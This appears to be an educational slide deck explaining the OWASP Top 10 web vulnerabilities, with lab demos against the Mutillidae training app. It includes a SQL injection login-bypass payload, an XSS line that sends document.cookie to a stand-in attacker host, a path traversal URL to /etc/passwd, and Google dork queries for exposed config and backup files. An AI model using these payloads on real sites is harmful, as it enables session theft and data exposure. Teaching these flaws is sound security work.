OWASP Top 10 explained

By: Jaimin Gohel

About Speaker

MCA(GLSICT)
Bug hunter
Developer @QlooIT Solutions
Speaker @Mozilla Gujarat

Top 10 Web App Vulnerabilities
Zap proxy
Mutillidae

What is OWASP?

The Open Web Application Security Project

The Open Web Application Security Project (OWASP) is a not-for-profit group that helps organizations develop, purchase, and maintain software applications that can be trusted.

-wiki

Overview of Web Application Hacking

Back-end scripting languages(PHP,Node,Ruby,etc)
- SQLi, Command injection, directory traversal, file uploads and direct object references...
Front-end scripting languages(Javascript)
- Unvalidated client-side redirects, client-side auth, , Reflected XSS, cookies, local storage...

What makes a website vulnerable?

Overview of Web Application Hacking(cont.)

Money, Boredom, Espionage, denial of service
Bug Hunters looking for a bounty
Red team trying to find bugs before the bad guys do

Why do people in general hack websites?

Why do we hack websites?

Create business value – this is the number one goal
“Help businesses to be safe, secure, and successful” – Robert Hurlbut, Amherst Sec.

Five Phases of a Pentest

Phase 1 | Reconnaissance
- Active (touching) or passive (indirect) data gathering on target
Phase 2 | Scanning
- Manual and automatic tools used to learn more about the infrastructure
Phase 3 | Gaining Access
- Taking control, extracting data, pivoting to attack other targets.
Phase 4 | Maintaining Access
- Persist, remain stealthy / don’t get caught and extract as much data as possible
Phase 5 | Covering Tracks
- Any changes, authorizations, etc. all must return to a state of non-recognition.

The Top 10 (2013)

A1-Injection
A2-Broken Authentication and Session Management
A3-Cross Site Scripting (XSS)
A4-Insecure Direct Object References
A5-Security Misconfiguration
A6-Sensitive Data Exposure
A7-Missing Function Level Access Control – broader version of “restrict URL access”
A8-Cross Site Request Forgery (CSRF)
A9-Using Known Vulnerable Components – extracted from Security Misconfigurations
A10-Unvalidated Redirects and Forwards

The Top 10 (2017)

A1-Injection
A2-Broken Authentication and Session Management
A3-Cross Site Scripting (XSS)
A4-Broken Access Control – Restrict what authenticated users are allowed to do.
A5-Security Misconfiguration
A6-Sensitive Data Exposure
A7-Insufficient Attack Protection – IDS / WAF to detect / stop attacks as they happen
A8-Cross Site Request Forgery (CSRF)
A9-Using Components with Known Vulnerabilities
A10-Underprotected APIs – Protect your APIs, check for vulnerabilities

A1-Injection

Vulnerable code:

<?php mysql_query(“select user where name = ‘“.$_POST[‘name’].”’ AND 
password = ‘“.$_POST[‘password’].”’) ?>

name = ‘ or 1=1 – ← there is a space after the SQL comment

SQLi: SELECT user where name = '' or 1=1 -- AND password = '' ← always true

http://127.0.0.1/mutillidae/index.php?page=user-info.php

SQL Injection

A2-Broken Authentication / Session Management

Cookie Manipulation – login, watch for cookies, what can you change?
Cookie security headers
- Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly

http://127.0.0.1/mutillidae/index.php?page=login.php

A3-Cross Site Scripting (XSS)

Steal cookies
document.createElement('image').src='http://ev.il.site.com/?data='+document.cookie
Phishing and Malware
- document.getElementsByTagName('html')[0].innerHTML = "...";

http://127.0.0.1/mutillidae/index.php?page=dns-lookup.php

A4-Insecure Direct Object References

Files / directories / database keys directly accessible
Backup files? Backup.tar.gz, backup.zip
Config files? config.zip, config.inc, .htaccess ...
Editor files? Index.php.swp, index.php.swo, index.php~ ...
Files uploaded to the server? /images, /tmp, /var/logs, wp-uploads...

http://127.0.0.1/mutillidae/index.php?page=/etc/passwd

A5-Security Misconfiguration

Outdated versions of software?
Extra permissions?
Unnecessary ports open?

A6-Sensitive Data Exposure

Error messages showing SQL queries?
Database type / version? Web server type / version?
Filesystem paths?
Credit card numbers? Passwords?

A6-Sensitive Data Exposure(cont.)

site:example.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
site:example.com ext:sql | ext:dbf | ext:mdb
site:example.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
site:example.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near"

A7-Missing Function Level Access Controls

Admin pages accessible by regular users?
Can a non-admin user do something only an admin should be able to?
eg. Twitter example

A7-Missing Function Level Access Controls(cont.)

A8-Cross Site Request Forgery (CSRF)

Burpsuite has a tool for generating CSRF payloads automatically
The attacker builds a form or a link that triggers an action on the target website

A8-Cross Site Request Forgery (CSRF) (cont.)

A9-Using Known Vulnerable Components

Banner Grab / Nmap → CVE lookup
PHP? Apache? WordPress? Drupal? SSH? FTP? Windows?
apache struts? Heartbleed?
- EG:- CVE(Common Vulnerabilities and Exposures ), exploit-db.com, searchsploit in kali

A10-Unvalidated Redirects and Forwards

Send users to a different domain than the one shown for the link
- http://127.0.0.1/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.google.com/
Make a user trigger your XSS attack
Trick a user with a copy of the page hosted elsewhere
Social engineer to download backdoors, steal passwords, etc.

Credits

Chad Furman
http://chads.website/